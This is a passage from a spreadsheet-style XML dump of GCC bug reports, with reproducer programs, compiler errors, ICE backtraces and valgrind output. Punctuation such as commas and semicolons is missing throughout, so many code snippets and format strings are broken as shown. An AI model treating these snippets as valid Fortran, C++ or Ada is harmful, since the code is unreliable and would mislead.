    real parameter :: nanp = transfer(z'7FD00000' 0.0)
    real parameter :: zerop = 0.0
    real :: nan = nanp pinf = pinfp ninf = ninfp zero = zerop
    print 100 zero  zero  fraction(zero)  fraction(zero)  exponent(zero)
    print 100 zerop zerop fraction(zerop) fraction(zerop) exponent(zerop)
    print 100 nan   nan   fraction(nan)   fraction(nan)   exponent(nan)
    print 100 nanp  nanp  fraction(nanp)  fraction(nanp)  exponent(nanp)
    print 100 ninf  ninf  fraction(ninf)  fraction(ninf)  exponent(ninf)
    print 100 ninfp ninfp fraction(ninfp) fraction(ninfp) exponent(ninfp)
    print 100 pinf  pinf  fraction(pinf)  fraction(pinf)  exponent(pinf)
    print 100 pinfp pinfp fraction(pinfp) fraction(pinfp) exponent(pinfp)
100 format (f10.51xz81xf10.51xz81xi11)
end program test_fractnan
Result:
   0.00000        0    0.00000        0           0
   0.00000        0    0.00000        0           0
       NaN 7FD00000        NaN 7FD00000           0
       NaN 7FD00000    0.00000        0           0
 -Infinity FF800000  -Infinity FF800000           0
 -Infinity FF800000        NaN 7FC00000 -2147483645
  Infinity 7F800000   Infinity 7F800000           0
  Infinity 7F800000        NaN 7FC00000 -2147483645
Expected result (-std=f2003):
   0.00000        0    0.00000        0           0
   0.00000        0    0.00000        0           0
       NaN 7FD00000        NaN 7FD00000  2147483647
       NaN 7FD00000        NaN 7FD00000  2147483647
 -Infinity FF800000  -Infinity FF800000  2147483647
 -Infinity FF800000  -Infinity FF800000  2147483647
  Infinity 7F800000   Infinity 7F800000  2147483647
  Infinity 7F800000   Infinity 7F800000  2147483647
Expected result (-std=f2008):
   0.00000        0    0.00000        0           0
   0.00000        0    0.00000        0           0
       NaN 7FD00000        NaN 7FD00000  2147483647
       NaN 7FD00000        NaN 7FD00000  2147483647
 -Infinity FF800000        NaN 7FC00000  2147483647
 -Infinity FF800000        NaN 7FC00000  2147483647
  Infinity 7F800000        NaN 7FC00000  2147483647
  Infinity 7F800000        NaN 7FC00000  2147483647
EXPONENT(X)
Fortran 2003/2008:
If X is an IEEE infinity or NaN the result has the value HUGE (0).
FRACTION(X)
Fortran 2003:
If X is an IEEE infinity the result is that infinity. If X is an IEEE NaN the result is that NaN.
Fortran 2008:
If X is an IEEE NaN the result is that NaN. If X is an IEEE infinity the result is an IEEE NaN.
Bug 1:
The program does not compile without -fno-range-check.
Bug 2:
Different results are returned for a variables with values of NaN/Infinity and compile-time constants NaN/Infinity.
Bug 3:
EXPONENT should be HUGE(0)=2147483647 for NaN/Infinity.</t>
  </si>
  <si>
    <t>thenlich+gccbug</t>
  </si>
  <si>
    <t>GCC-9340</t>
  </si>
  <si>
    <t>compiling port /usr/ports/databases/postgresql7 failed</t>
  </si>
  <si>
    <t>gmake[4]: Entering directory `/usr/ports/databases/postgresql7/work/postgresql-7.3.1/src/backend/utils/mb/conversion_procs/utf8_and_gb18030'
cc -O -pipe  -Wall -Wmissing-prototypes -Wmissing-declarations -fpic -DPIC -I../../../../../../src/include -I/usr/local/include  -c -o utf8_and_gb18030.o utf8_and_gb18030.c
{standard input}: Assembler messages:
{standard input}:126720: Warning: partial line at end of file ignored
cc: Internal error: Killed (program cc1)
Please submit a full bug report.
See  for instructions.
gmake[4]: *** [utf8_and_gb18030.o] Error 1
gmake[4]: *** Deleting file `utf8_and_gb18030.o'
gmake[4]: Leaving directory `/usr/ports/databases/postgresql7/work/postgresql-7.3.1/src/backend/utils/mb/conversion_procs/utf8_and_gb18030'
gmake[3]: *** [all] Error 2
gmake[3]: Leaving directory `/usr/ports/databases/postgresql7/work/postgresql-7.3.1/src/backend/utils/mb/conversion_procs'
gmake[2]: *** [all] Error 2
gmake[2]: Leaving directory `/usr/ports/databases/postgresql7/work/postgresql-7.3.1/src'
gmake[1]: *** [all] Error 2
gmake[1]: Leaving directory `/usr/ports/databases/postgresql7/work/postgresql-7.3.1'
gmake: *** [all] Error 2
*** Error code 2
Release:
gcc version 3.2.1 [FreeBSD] 20021119 (release) posix
Environment:
FreeBSD 5.0-RC2 sparc64 (Ultra5)</t>
  </si>
  <si>
    <t>ljrittle</t>
  </si>
  <si>
    <t>piotr.wozniak</t>
  </si>
  <si>
    <t>GCC-3033</t>
  </si>
  <si>
    <t>The 'using typename' construct won't compile</t>
  </si>
  <si>
    <t xml:space="preserve">	C++ allows the word 'typename' after a 'using' directive.  _The C++ Programming Language_ (third edition) [Stroustrup] section A.7 (Grammar/Declarations) defines the using directive:
	  using-declaration:
	      using typename(opt) ::(opt) nested-name-specifier 
	      unqualified-id 
Release:
3.0 20010526 (Debian prerelease) (Debian testing/unstable)
Environment:
System: Linux burn 2.2.18 #1 Thu Dec 14 09:22:25 PST 2000 i686 unknown
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-x --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
How-To-Repeat:
	Attempt to compile the following:
	  struct C { 
	    typedef int INT
	  }
	  struct D : public C {
	    using typename C::INT
	  }
	  int main() { 
	    D::INT x = 666
	  }
	The compiler complains:
	  test.cc:6: parse error before `typename'</t>
  </si>
  <si>
    <t>GCC-70590</t>
  </si>
  <si>
    <t>[6 Regression] r234810 causes error: location references block not in block tree</t>
  </si>
  <si>
    <t>Since r234810 Firefox doesn't build anymore on ppc64le:
trippels@gcc2-power8 xslt % /home/trippels/gcc_test/usr/local/bin/c++ -c -w -O2 -std=gnu++0x txMozillaXMLOutput.ii
/home/trippels/gecko-dev/dom/xslt/xslt/txMozillaXMLOutput.cpp: In member function â€˜MozExternalRefCountType nsNodeInfoManager::Release()â€™:
/home/trippels/gecko-dev/dom/xslt/xslt/txMozillaXMLOutput.cpp:1081:1: error: location references block not in block tree
 }
 ^
&amp;_cycleCollectorGlobal.D.86308
D.356459 = nsCycleCollectingAutoRefCnt::decr (D.356455 this 
/home/trippels/gecko-dev/dom/xslt/xslt/txMozillaXMLOutput.cpp:1081:1: internal compiler error: verify_gimple failed
0x10b189e3 verify_gimple_in_cfg(function* bool)
        ../../gcc/gcc/tree-cfg.c:5125
0x109ba45f execute_function_todo
        ../../gcc/gcc/passes.c:1958
0x109bb223 do_per_function
        ../../gcc/gcc/passes.c:1652
0x109bb42f execute_todo
        ../../gcc/gcc/passes.c:2010
Reducing...</t>
  </si>
  <si>
    <t>ppalka</t>
  </si>
  <si>
    <t>GCC-44795</t>
  </si>
  <si>
    <t>[4.6 Regression] Bad testsuite changes</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 161747 gave
ERROR: couldn't compile regular expression pattern: parentheses () not balanced
ERROR: tcl error sourcing /export/gnu/import/svn/gcc-test/src-trunk/gcc/testsuite/gfortran.dg/dg.exp.
Revision 161734 is OK.</t>
  </si>
  <si>
    <t>GCC-41100</t>
  </si>
  <si>
    <t>[4.4/4.5 regression] Unchecked_Deallocation causes wrong free errors</t>
  </si>
  <si>
    <t>(Forwarding Debian Bug#542158)
Unchecked_Deallocation of a record extension containing an Unbounded_String executes incorrectly. Here is a reproducer:
with Ada.Strings.Unbounded
use Ada.Strings.Unbounded
package Double_Free is
   type Test_Base is tagged null record
   type Test_Class_Access is access all Test_Base'Class
   type Test_Extension is new Test_Base with record
      Last_Name : Unbounded_String := Null_Unbounded_String
   end record
end Double_Free
   ---
with Ada.Unchecked_Deallocation
with Double_Free use Double_Free
procedure Main is
   procedure Free is new Ada.Unchecked_Deallocation
     (Object =&gt; Test_Base'Class
      Name   =&gt; Test_Class_Access)
   Handle : Test_Class_Access := new Test_Extension
begin
   Free (Handle)
end Main
$ gnatmake main.adb
$ ./main
*** glibc detected *** main: double free or corruption errors.
valgrind --leak-check=full --show-reachable=yes --leak-resolution=high ./main
==5772== Memcheck a memory error detector.
==5772== Copyright (C) 2002-2008 and GNU GPL'd by Julian Seward et al.
==5772== Using LibVEX rev 1884 a library for dynamic binary translation.
==5772== Copyright (C) 2004-2008 and GNU GPL'd by OpenWorks LLP.
==5772== Using valgrind-3.4.1-Debian a dynamic binary instrumentation framework.
==5772== Copyright (C) 2000-2008 and GNU GPL'd by Julian Seward et al.
==5772== For more details rerun with: -v
==5772==
==5772== Invalid free() / delete / delete[]
==5772==    at 0x4C2261F: free (vg_replace_malloc.c:323)
==5772==    by 0x50A8D84: __gnat_free (in /usr/lib/libgnat-4.4.so.1)
==5772==    by 0x403FC4: _ada_main (in /home/reet/double-free/obj/main)
==5772==    by 0x40327B: main (in /home/reet/double-free/obj/main)
==5772==  Address 0x5b3b040 is 16 bytes inside a block of size 136 alloc'd
==5772==    at 0x4C2391E: malloc (vg_replace_malloc.c:207)
==5772==    by 0x50A8DC7: __gnat_malloc (in /usr/lib/libgnat-4.4.so.1)
==5772==    by 0x403EF0: _ada_main (in /home/reet/double-free/obj/main)
==5772==    by 0x40327B: main (in /home/reet/double-free/obj/main)
==5772==
==5772== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 8 from 1)
==5772== malloc/free: in use at exit: 136 bytes in 1 blocks.
==5772== malloc/free: 1 allocs 1 frees 136 bytes allocated.
==5772== For counts of detected errors rerun with: -v
==5772== searching for pointers to 1 not-freed blocks.
==5772== checked 203328 bytes.
==5772==
==5772==
==5772== 136 bytes in 1 blocks are definitely lost in loss record 1 of 1
==5772==    at 0x4C2391E: malloc (vg_replace_malloc.c:207)
==5772==    by 0x50A8DC7: __gnat_malloc (in /usr/lib/libgnat-4.4.so.1)
==5772==    by 0x403EF0: _ada_main (in /home/reet/double-free/obj/main)
==5772==    by 0x40327B: main (in /home/reet/double-free/obj/main)
==5772==
==5772== LEAK SUMMARY:
==5772==    definitely lost: 136 bytes in 1 blocks.
==5772==      possibly lost: 0 bytes in 0 blocks.
==5772==    still reachable: 0 bytes in 0 blocks.
==5772==         suppressed: 0 bytes in 0 blocks.
Freeing memory of a base type object (Test_Base) works without problems.
When the unbounded string field (Name) is removed or replaced (e.g. by
an Integer) freeing also works for the type extension.
The code has been tested with the following compiler / arch
combinations:
i386/gnat-4.3  : works
i386/gnat-4.4  : works
amd64/gnat-4.3 : works
amd64/gnat-4.4 : FAILS
This bug hurts PolyORB and prevents us from migrating all Ada packages in Debian to gnat-4.4.</t>
  </si>
  <si>
    <t>GCC-56816</t>
  </si>
  <si>
    <t>[4.8/4.9 regression] ICE in delete_root</t>
  </si>
  <si>
    <t>Created attachment 29777
problem  occured trying to compile Metcalf example in MODERN FORTRAN EXPLAINED
DP@P-DP /cygdrive/c/users/dp/desktop/metcalf
$ gfortran -v -c myitem_list_module.f03
Using built-in specs.
COLLECT_GCC=C:\Program Files (x86)\gfortran\bin\gfortran.exe
Target: mingw32
Configured with: ../gcc-trunk/configure --prefix=/mingw --enable-languages=cfortranlto --with-gmp=/home/brad/gfortran/dependencies --disable-werror --enable-threads --enable-nls --build=i586-pc-mingw32 --enable-libgomp --enable-shared --disable-win32-registry --with-dwarf2 --disable-sjlj-exceptions --enable-lto --build=mingw32 --enable-version-specific-runtime-libs
Thread model: win32
gcc version 4.8.0 20130302 (experimental) [trunk revision 196403] (GCC)
COLLECT_GCC_OPTIONS='-v' '-c' '-mtune=i386' '-march=i386'
 c:/program files (x86)/gfortran/bin/../libexec/gcc/mingw32/4.8.0/f951.exe myitem_list_module.f03 -quiet -dumpbase myitem_list_module.f03 -mtune=i386 -march=i386 -auxbase myitem_list_module -version -fintrinsic-modules-path c:/program files (x86)/gfortran/bin/../lib/gcc/mingw32/4.8.0/finclude -o C:\cygwin\tmp\cckGnVj1.s
GNU Fortran (GCC) version 4.8.0 20130302 (experimental) [trunk revision 196403] (mingw32)
        compiled by GNU C version 4.8.0 20130302 (experimental) [trunk revision 196403] GMP version 5.0.2 MPFR version 3.1.0 MPC version 0.9
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU Fortran (GCC) version 4.8.0 20130302 (experimental) [trunk revision 196403] (mingw32)
        compiled by GNU C version 4.8.0 20130302 (experimental) [trunk revision 196403] GMP version 5.0.2 MPFR version 3.1.0 MPC version 0.9
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
f951.exe: internal compiler error: Segmentation fault
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>mikael</t>
  </si>
  <si>
    <t>dominique.pelletier</t>
  </si>
  <si>
    <t>GCC-1105</t>
  </si>
  <si>
    <t>really last test this time I mean it.</t>
  </si>
  <si>
    <t xml:space="preserve">From: Jason Molenda 
To: java-bugs@sourceware.cygnus.com
Cc:  
Subject: Re: gcj/10: really last test this time I mean it.
Date: Mon 12 Jul 1999 13:35:48 -0700
 See if a follow-up goes to apbianco and the list.
</t>
  </si>
  <si>
    <t>crash</t>
  </si>
  <si>
    <t>GCC-51477</t>
  </si>
  <si>
    <t>[c++0x] ICE with initialization of invalid non-static data member</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on trunk:
===========================
struct A
{
  typedef int int T
  struct T x[1] = { 0 }
}
===========================
bug.cc:3:19: error: two or more data types in declaration of 'T'
bug.cc:1:8: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-78206</t>
  </si>
  <si>
    <t>driver</t>
  </si>
  <si>
    <t>bootstrap failure under Apple sandbox that blacklists reads in /usr/local</t>
  </si>
  <si>
    <t>I ran into a rather interesting bootstrap failure for all FSF gcc releases when performed under an Apple sandbox configured to blacklist reads in /usr/local. The libgcc configure run using the stage1 xgcc compiler fails with the error...
configure:3462: /sw/src/fink.build/gcc6-6.2.0-2/darwin_objdir/./gcc/xgcc -B/sw/src/fink.build/gcc6-6.2.0-2/darwin_objdir/./gcc/ -B/sw/lib/gcc6/x86_64-apple-darwin15.6.0/bin/ -B/sw/lib/gcc6/x86_64-apple-darwin15.6.0/lib/ -isystem /sw/lib/gcc6/x86_64-apple-darwin15.6.0/include -isystem /sw/lib/gcc6/x86_64-apple-darwin15.6.0/sys-include    -o conftest -g -O2   conftest.c  &gt;&amp;5
cc1: error: /usr/local/include: Operation not permitted
This bootstrap failure is suppressed if the configure option --with-local-prefix=/sw or --with-local-prefix=/ is passed under the sandbox build.
I assume cc1 is performing an stat() call on the /usr/include directory which fails  in an unrecoverable manner due to the sandbox.
Note the Apple sandbox in this case was run with 'sandbox-exec -f fink.sb' where the fink.sb file contained...
(version 1)
(allow default)
(deny file*
       (subpath /usr/local)
)</t>
  </si>
  <si>
    <t>GCC-39494</t>
  </si>
  <si>
    <t>Bad assembly when derived class has same name as virtual method</t>
  </si>
  <si>
    <t>I'm sorry...I don't know what triplet means.  There was nothing about it in the FAQ. I took my best guess.
g++ -v --version prints
g++ (Debian 4.3.2-1.1) 4.3.2
cat /proc/version prints
Linux version 2.6.26-1-686 (Debian 2.6.26-13) (waldi@debian.org) (gcc version 4.1.3 20080704 (prerelease) (Debian 4.1.2-24)) #1 SMP Sat Jan 10 18:29:31 UTC 2009
I'm using the stock g++ build that came from Debian whatever compiler options they use.
After I traced it down the problem turned out to be fairly simple  [to produce].
In what looks [to me] like the vtable for the constructor of the derived class the compiler's appending *INTERNAL*.
Since I don't know whether there's a page 2
The command  gcc -c -Wall compilerBug.cpp
produces the output 
/tmp/ccHFsjIR.s: Assembler messages:
/tmp/ccHFsjIR.s:68: Warning: missing operand zero assumed
/tmp/ccHFsjIR.s:68: Error: undefined symbol `INTERNAL' in operation
The line it's complaining about looks like this:
	.long	_ZN7DerivedC1Ev *INTERNAL* 
I've boiled the precompiled source file down to
# 1 compilerBug.cpp
# 1 
# 1 
# 1 compilerBug.cpp
class Base
{
   public:
      virtual void Derived() = 0
}
class Derived : public Base
{
   public:
      Derived()
}
Derived::Derived()
   : Base()
{}
(Everything else I tried to delete let the compiler optimize everything away).
I have no idea what the standard says about how this should actually work (or not). Compiler error about conflicting symbols?  Warning about this is stupid and you probably don't want to do it? Or just go ahead and magically work?
Especially since the work-around's as easy as renaming either the function or the derived class.
I just know that the FAQ says that invalid assembly output is a bug so here we go.
Thanks *so* much for committing time and effort to work on the compiler. It really is the heart and soul of the entire free software movement.</t>
  </si>
  <si>
    <t>james.ashley</t>
  </si>
  <si>
    <t>GCC-59346</t>
  </si>
  <si>
    <t>[4.9 Regression] s-osinte.adb:107:35: expected type Interfaces.C.long</t>
  </si>
  <si>
    <t>/test/gnu/gcc/objdir/./gcc/xgcc -B/test/gnu/gcc/objdir/./gcc/ -B/opt/gnu/gcc/gcc
-4.9/hppa2.0w-hp-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-4.9/hppa2.0w-hp-hpux11.11/lib
/ -isystem /opt/gnu/gcc/gcc-4.9/hppa2.0w-hp-hpux11.11/include -isystem /opt/gnu/
gcc/gcc-4.9/hppa2.0w-hp-hpux11.11/sys-include    -c -g -O2  -fPIC  -W -Wall -gna
tpg -nostdinc   s-osinte.adb -o s-osinte.o
s-osinte.adb:107:35: expected type Interfaces.C.long
s-osinte.adb:107:35: found type System.Os_Interface.time_t
make[7]: *** [s-osinte.o] Error 1
# ls -l *osint*
lrwxr-xr-x 1 bin bin 44 Nov 21 05:43 s-osinte.adb -&gt; /test/gnu/gcc/gcc/gcc/ada/s-osinte-posix.adb
lrwxr-xr-x 1 bin bin 43 Nov 21 05:43 s-osinte.ads -&gt; /test/gnu/gcc/gcc/gcc/ada/s-osinte-hpux.ads
      return timespec'(tv_sec =&gt; S
                       tv_nsec =&gt; time_t (Long_Long_Integer (F * 10#1#E9)))
Probably introduced by the following change:
2013-11-15  H.J. Lu  
        PR ada/54040
        * s-linux-x32.ads: New file.
        * s-osprim-x32.adb: Likewise.
        * s-linux.ads (time_t): New type.
        * s-linux-alpha.ads (time_t):  Likewise.
        * s-linux-hppa.ads (time_t):  Likewise.
        * s-linux-mipsel.ads (time_t):  Likewise.
        * s-linux-sparc.ads (time_t):  Likewise.
        * s-osinte-linux.ads (time_t): Mark it private.  Replace long
        with System.Linux.time_t.
        (timespec): Replace long with time_t.
        * s-osinte-posix.adb (To_Timespec): Likewise.
        * s-taprop-linux.adb (timeval): Replace C.long with
        System.OS_Interface.time_t.
        * gcc-interface/Makefile.in (LIBGNAT_TARGET_PAIRS): Replace
        s-linux.ads with s-linux-x32.ads s-osprim-posix.adb with
        s-osprim-x32.adb for x32.</t>
  </si>
  <si>
    <t>GCC-49623</t>
  </si>
  <si>
    <t>Segfault of gfortran -L if no argument follows the -L</t>
  </si>
  <si>
    <t>While it works for the C driver:
$ gcc foo.c -L
gcc: error: missing argument to â€˜-Lâ€™
the Fortran driver segfaults when there is no argument following the -L argument:
$ gfortran foo.f90 -L
Segmentation fault
Valgrind shows:
==18481== Invalid read of size 1
==18481==    at 0x4A06D82: strlen (mc_replace_strmem.c:275)
==18481==    by 0x40E8BE: lang_specific_driver (gfortranspec.c:95)
==18481==    by 0x405EBF: process_command (gcc.c:3637)
==18481==    by 0x40B455: main (gcc.c:6263)
==18481==  Address 0x0 is not stack'd malloc'd or (recently) free'd</t>
  </si>
  <si>
    <t>GCC-81073</t>
  </si>
  <si>
    <t>[6 Regression] link failure as C++ misses to instantiate some objects</t>
  </si>
  <si>
    <t>$ g++ struct.cpp -Os -save-temps
the following C++ test case struct.cpp:
struct test { const int *addr }
const test* setup()
{
    static constexpr test atest =
    {
        ({ static const int inner = 123  })
    }
    return 
}
int main(){}
This gives a linker error:
struct.o:(.rodata+0x0): undefined reference to `setup()::inner'
atest is initialized as expected with a reference to _ZZ5setupvE5inner but that object is never instanciated resulting in a link failure.
Seeing this with v7.1 on and for x86_64-linux-gnu also on trunk (future v8).</t>
  </si>
  <si>
    <t>GCC-52700</t>
  </si>
  <si>
    <t>lib* configure fails on --enable-symvers=gnu-versioned-namespace.</t>
  </si>
  <si>
    <t>the 4.7.1 boostrap fails inside libjava on --enable-symvers=gnu-versioned-namespace option.
(...)
checking whether ld supports anonymous version scripts... configure: error: Unknown argument to enable/disable symvers
make[1]: *** [configure-target-libjava] Error 1
afaics it accepts only yes/no values:
# See if linker supports anonymous version scripts.
AC_CACHE_CHECK([whether ld supports anonymous version scripts]
  [libjava_cv_anon_version_script]
  [AC_ARG_ENABLE(symvers
     AS_HELP_STRING([--disable-symvers]
                    [disable symbol versioning for libjava])
       [case $enableval in
         yes) libjava_cv_anon_version_script=yes 
         no)  libjava_cv_anon_version_script=no 
         *)   AC_MSG_ERROR([Unknown argument to enable/disable symvers])
        esac]
       [libjava_cv_anon_version_script=yes]
   )</t>
  </si>
  <si>
    <t>GCC-3066</t>
  </si>
  <si>
    <t>configure.in generates bad arguments for cross compiling libraries</t>
  </si>
  <si>
    <t>configure.in translates --target=xxx to --host=xxx and sends --with-cross-host=${host_alias} down to compilations of libraries.  Additionally when --with-cross-host is defined libstdc++-v3 assumes that unless you declare the target as *-*-linux* you are using newlib and overrides whatever is appropriately determined by configure.target.
Release:
CVS tree
Environment:
FreeBSD 4.3 cross compiling for arm-wrs-vxworks
How-To-Repeat:
I am configuring as follows:
../configure --disable-shared --without-pic --prefix=/usr/wind/host/x86-freebsd --target=arm-wrs-vxworks</t>
  </si>
  <si>
    <t>GCC-13377</t>
  </si>
  <si>
    <t>[3.4 regression] unexpected behavior of namespace usage directive</t>
  </si>
  <si>
    <t>$ cat &gt; test.cpp
namespace N1
{
  namespace N2
  {
  }
}
namespace N2
{
}
using namespace N1
using namespace N2
$ g++ --version
g++ (GCC) 3.3.2 (Debian)
$ g++ -c test.cpp
test.cpp:13: error: `' is not a namespace
$</t>
  </si>
  <si>
    <t>GCC-24336</t>
  </si>
  <si>
    <t>fortran variable name exceeds the maximum limit per standard</t>
  </si>
  <si>
    <t>As per the standard for fortran 95 the maximum length of a variable is 31 characters. But gfortran doesn't truncate complain or warn (is it platform dependent?) when that is not true like in following case
$ cat test.f90
program test_name
      integer abcdefghijklmnopqrstuvwxyz123456
      abcdefghijklmnopqrstuvwxyz123456 = 10
      print * abcdefghijklmnopqrstuvwxyz123456
      print * abcdefghijklmnopqrstuvwxyz12345
end program
$ gfortran test.f90
$ ./a.out
     10
2.5261893E-29
$ gfortran -v
Using built-in specs.
Target: powerpc64-linux
Configured with: /home/gccbuild/gcc_mline_anoncvs/gcc/configure --prefix=/opt/gcc-nightly/mline-20051011 --build=powerpc64-linux --host=powerpc64-linux --target=powerpc64-linux --with-cpu=default32 --with-as=/opt/gcc-nightly/mline-20051011/bin/as --with-ld=/opt/gcc-nightly/mline-20051011/bin/ld --enable-threads=posix --enable-shared --enable-__cxa_atexit --enable-languages=cc++f95javaobjcobj-c++ --enable-checking --with-mpfr=/opt/gcc-nightly/mline-20051011
Thread model: posix
gcc version 4.1.0 20051010 (experimental)</t>
  </si>
  <si>
    <t>uttamp</t>
  </si>
  <si>
    <t>GCC-58749</t>
  </si>
  <si>
    <t>PACK(ADJUSTL([ a b]) [.TRUE..FALSE.]) causes an internal compiler error</t>
  </si>
  <si>
    <t>Hi There! 
The following tiny program causes an internal compiler error:
&gt; PROGRAM test
&gt;   WRITE(**) PACK(ADJUSTL([ a  b]) [.TRUE. .FALSE.])
&gt; END PROGRAM test
I tried with:
 * gfortran 4.4.5
 * gfortran 4.7.2
 * gfortran 4.8.0
Any ideas?
Cheers Stefan</t>
  </si>
  <si>
    <t>stefan.mauerberger</t>
  </si>
  <si>
    <t>GCC-14305</t>
  </si>
  <si>
    <t>make install tries to modify source tree</t>
  </si>
  <si>
    <t>Perhaps it is not really a bug but at least I think it is unwanted.
&gt; mkdir gcc-3.3.3-jr-obj
&gt; cd gcc-3.3.3-jr-obj
&gt; ../gcc-3.3.3-jr/configure --prefix=/tools/pkg/gcc/3.3.3 \
      --enable-languages=cc++f77
&gt; make bootstrap
&gt; make install
...
make[2]: Leaving directory `/pdv/.tools/inst/jrichter/gcc-3.3.3-jr-obj/gcc'
f/intdoc &gt; ../../gcc-3.3.3-jr/gcc/f/intdoc.texi
/bin/sh: ../../gcc-3.3.3-jr/gcc/f/intdoc.texi: Permission denied
make[1]: *** [../../gcc-3.3.3-jr/gcc/f/intdoc.texi] Error 1
make[1]: Leaving directory `/pdv/.tools/inst/jrichter/gcc-3.3.3-jr-obj/gcc'
make: *** [install-gcc] Error 2
Here something wants to write to the source tree. But the install user has no 
permissions to write there.</t>
  </si>
  <si>
    <t>joerg.richter</t>
  </si>
  <si>
    <t>GCC-45577</t>
  </si>
  <si>
    <t>[4.6 Regression] Bogus(?) ... type incompatible with source-expr ... error</t>
  </si>
  <si>
    <t>Between revisions 163718 (working) and 163913 the following code (and friends) gives a possibly bogus error:
[macbook] f90/bug% cat allocate_type_red.f90
program main
type b_obj
  integerallocatable :: c(:)
end type b_obj
type (b_obj)allocatable :: b(:)
integerallocatable :: c(:)
integer :: in
n = 3
allocate(b(n)c(n))
end program main 
[macbook] f90/bug% gfc allocate_type_red.f90
allocate_type_red.f90:12.14:
allocate(b(n)c(n))
              1
allocate_type_red.f90:3.10:
type b_obj
          2
Error: Type of entity at (1) is type incompatible with source-expr at (2)
I suspect revision 163862.</t>
  </si>
  <si>
    <t>GCC-720</t>
  </si>
  <si>
    <t>C++ inlining problems</t>
  </si>
  <si>
    <t>3 Nov 2000 jbuck: adding a much simpler test case
original report is below.
Try compiling this function with -O2 -S: (it is a model
of the tree produced by the tree-based inliner for the
larger case below):
---------------------------------------------------
double accumulate(double* first double* last double result)
{
    while (first != last) {
	const double
	const double
	double tmp = x + y
	result = tmp
    }
    return result
}
--------------------------------------------------
We get the same problem (two loads and a store) in the
loop as below.  So the problem is with references
not the inliner in particular.
Here is the original report:
-------------------------
Consider this code (a small piece of the Stepanov benchmark):
-------------------------------
struct {
  double operator()(const double }
} plus
template 
Number accumulate(Iterator first Iterator last Number result) {
  while (first != last) result =  plus(result *first++)
  return result
}
double call_accum(double* first double* last double zero)
{
    return accumulate(first last zero)
}
------------------------------
gcc 2.95.2 does a near-perfect job on this code thanks to the ADDRESSOF
optimzation a very clean job of inlining is done.  Solaris/Sparc code
at -O2 (unused labels deleted):
--------------------------------------------------------------
double accumulate(double * double * double):
	!#PROLOGUE# 0
	add	%sp -120 %sp
	!#PROLOGUE# 1
	std	%o2 [%sp+96]
	ldd	[%sp+96] %f2
	cmp	%o0 %o1
	fmovs	%f2 %f0
	be	.LL8
	fmovs	%f3 %f1
.LL9:
	mov	%o0 %g2
	ldd	[%g2] %f2
	add	%o0 8 %o0
	cmp	%o0 %o1
	bne	.LL9
	faddd	%f0 %f2 %f0
.LL8:
	retl
	sub	%sp -120 %sp
------------------------------------------------------------
(it seems that the loop could have one fewer instruction but not bad).
The current CVS snapshot does horribly:
----------------------------------------------------
double accumulate(double * double * double):
	!#PROLOGUE# 0
	add	%sp -120 %sp
	!#PROLOGUE# 1
	mov	%o0 %o4
	cmp	%o4 %o1
	be	.LL11
	std	%o2 [%sp+96]
	add	%sp 96 %o2
.LL7:
	mov	%o4 %o0
	ldd	[%o0] %f4
	add	%o4 8 %o4
	ldd	[%o2] %f2
	cmp	%o4 %o1
	faddd	%f2 %f4 %f2
	bne	.LL7
	std	%f2 [%sp+96]
.LL11:
	ldd	[%sp+96] %f0
	retl
	sub	%sp -120 %sp
---------------------------------------------------
The loop now does two loads and a store instead of one load.
The reason appears to be that result is committed to be in
memory because it is passed by reference.
In gcc 2.95.2 we had a special optimization (ADDRESSOF) that handled only
the case of an object that fits in a register (builtin type or one-element
struct) that would allow us to remove referencing for objs passed to
inline functions.  It seems that this no longer works.  Any clue as to how
hard it is to make the tree-based inliner do this transformation?  It
seems to me that it wouldn't be hard to remove the address-taking for any
passed object so we could do better than ADDRESSOF.
The result of this problem is that current snapshots (and gcc-2.96RH)
are much worse at inline functions and STL than gcc 2.95.2.
(gcc 2.95.2 is bad if the object passed by reference to an inline
function is say a 2-element struct).
Release:
gcc version 2.97 20001027 (experimental)
Environment:
sparc-sun-solaris2.5.1
How-To-Repeat:
Just compile code with -O2 -S and inspect output.</t>
  </si>
  <si>
    <t>jbuck</t>
  </si>
  <si>
    <t>GCC-68259</t>
  </si>
  <si>
    <t>[6 Regression][sso] tree checking failure in reverse_storage_order_for_component_p at tree.h:4392</t>
  </si>
  <si>
    <t>Created attachment 36670
test.ii compile with: g++ -S -O0 -fsanitize=undefined
Compiling attached test case with today's GCC trunk using
  g++ -S -O0 -fsanitize=undefined
fails as follows:
test.ii:77:1: internal compiler error: tree check: expected record_type or union_type or qual_union_type or array_type have reference_type in reverse_storage_order_for_component_p at tree.h:4392
 }
 ^
0xf7589c tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc/tree.c:9587
0xa10907 tree_check4(tree_node* char const* int char const* tree_code tree_code tree_code tree_code)
        ../../gcc/tree.h:3002
0xa10907 reverse_storage_order_for_component_p
        ../../gcc/tree.h:4392
0xa10907 get_inner_reference(tree_node* long* long* tree_node** machine_mode* int* int* int* bool)
        ../../gcc/expr.c:6901
0x8e6182 get_object_alignment_2
        ../../gcc/builtins.c:261
0x8e5f63 get_pointer_alignment_1(tree_node* unsigned int* unsigned long*)
        ../../gcc/builtins.c:429
0x8e687b get_pointer_alignment(tree_node*)
        ../../gcc/builtins.c:498
0x8c80e1 ubsan_maybe_instrument_reference_or_call
        ../../gcc/c-family/c-ubsan.c:414
0x8c9c02 ubsan_maybe_instrument_reference(tree_node*)
        ../../gcc/c-family/c-ubsan.c:441
0x81d6ca cp_genericize_r
        ../../gcc/cp/cp-gimplify.c:1319</t>
  </si>
  <si>
    <t>GCC-8324</t>
  </si>
  <si>
